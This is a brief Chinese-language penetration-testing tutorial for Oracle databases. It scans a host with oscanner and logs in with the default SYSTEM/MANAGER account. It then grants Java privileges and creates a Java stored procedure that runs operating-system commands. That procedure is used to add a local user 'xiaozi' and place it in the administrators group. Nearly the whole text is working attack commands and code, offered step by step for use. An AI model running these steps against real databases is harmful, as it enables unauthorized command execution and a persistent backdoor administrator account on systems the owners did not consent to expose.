一、oracle数据库扫描软件(oscanner)
1.安装oscanner(linux)
apt-get install oscanner
2.运行oscanner
oscanner -s 192.168.56.9 -P 1521
二、使用sqlplus进行远程连接oracle数据库
sqlplus.exe SYSTEM/MANAGER@192.168.56.9:1521/ora8
三、渗透测试(DBA权限)
1.首先开启java的权限
grant javasyspriv to SYSTEM;
2.新建Java.sql,内容为:
CREATE OR REPLACE AND RESOLVE Java SOURCE NAMED "JAVACMD" AS
import java.lang.*;
import java.io.*;
public class JAVACMD
{
public static void execCommand (String command) throws IOException
{
Runtime.getRuntime().exec(command);
}
};
/
CREATE OR REPLACE PROCEDURE JAVACMDPROC (p_command IN VARCHAR2)
AS LANGUAGE JAVA
NAME 'JAVACMD.execCommand (java.lang.String)';
/
3.执行cmd的命令
exec javacmdproc('cmd.exe /c net user xiaozi 123 /add');
exec javacmdproc('cmd.exe /c net localgroup administrators xiaozi /add');
等等